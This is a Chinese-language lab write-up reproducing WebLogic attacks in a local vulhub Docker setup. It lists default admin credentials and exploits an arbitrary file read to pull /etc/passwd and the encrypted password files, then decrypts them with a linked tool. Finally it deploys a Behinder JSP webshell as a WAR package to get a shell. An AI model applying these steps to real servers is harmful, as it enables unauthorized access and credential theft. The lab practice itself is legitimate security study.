环境搭建:
1.拉取docker:
cd /home/kali/桌面/vulhub/weblogic/weak_password
sudo docker-compose up -d
2.查看docker端口映射信息
sudo docker ps
3.在浏览器中输入http://192.168.111.128:7001/console/login/LoginForm.jsp:
http://192.168.111.128:7001/console/login/LoginForm.jsp
http://192.168.111.128:7001/console/login/LoginForm.jsp
漏洞复现
1.weblogic 弱口令(摘抄别人)此次环境的证号:weblogic 密码:weblogic@123
(1) Oracle - WebLogic
Method HTTP
User ID system
Password password
Level Administrator
Doc
Notes Login located at /console
(2)Oracle - WebLogic
Method HTTP
User ID weblogic
Password weblogic
Level Administrator
Doc
Notes Login located at /console
(3)Oracle - WebLogic
Version 9.0 Beta (Diablo)
User ID weblogic
Password weblogic
Doc
(4)Oracle - WebLogic Process Integrator
Version 2.0
User ID admin
Password security
Doc
(5)Oracle - WebLogic Process Integrator
Version 2.0
User ID joe
Password password
Doc
(6)Oracle - WebLogic Process Integrator
Version 2.0
User ID mary
Password password
Doc
(7)Oracle - WebLogic Process Integrator
Version 2.0
User ID system
Password security
Doc
(8) Oracle - WebLogic Process Integrator
Version 2.0
User ID wlcsystem
Password wlcsystem
Doc
(9)Oracle - WebLogic Process Integrator
Version 2.0
User ID wlpisystem
Password wlpisystem
Doc
2.weblogic任意文件读取漏洞
访问:
http://192.168.111.128:7001/hello/file.jsp?path=/etc/pass
就是下载pass文件,可以利用文件任意文件读取去读base_domain文件夹下的SerializedSystemIni.dat和config.xml文件,去解密weblogic密码
- 访问下面地址利用Brup suit然后抓包,放到”重放功能”。
http://192.168.111.128:7001/hello/file.jsp?path=security/SerializedSystemIni.dat
选中返回包中的乱码(是选中乱码然后右键),右键保存成一个bat文件
2)利用“重放功能”访问下面地址,可以看剑加密后的密码
http://192.168.111.128:7001/hello/file.jsp?path=config/config.xml
然后利用解密工具去解码,下载地址:
https://github.com/TideSec/Decrypt_Weblogic_Password
3.后台getshell
1)准备好war包:(war是一个可以直接运行的web模块,通常用于网站,打成包部署到容器中。war包放置到web目录下之后,可以自动解压,就相当于发布。)
jar -cvf blog.war shell.jsp -----------利用冰蝎jsp马制作war包
- 进入weblogic后台点击
“部署”->”安装”->”上载文件”->“下一步“->”下一步”(一直下一步,直到出现”完成点击完成“)
最后可以看见我们上传的war包已经安装上了
然后我们用冰蝎连接http://192.168.111.128:7001/shell/shell.jsp
参考:
https://blog.csdn.net/cscscys/article/details/107856619?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522164542919816780357272716%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&request_id=164542919816780357272716&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~first_rank_ecpm_v1~rank_v31_ecpm-3-107856619.pc_search_result_cache&utm_term=weblogic+weak_password&spm=1018.2226.3001.4187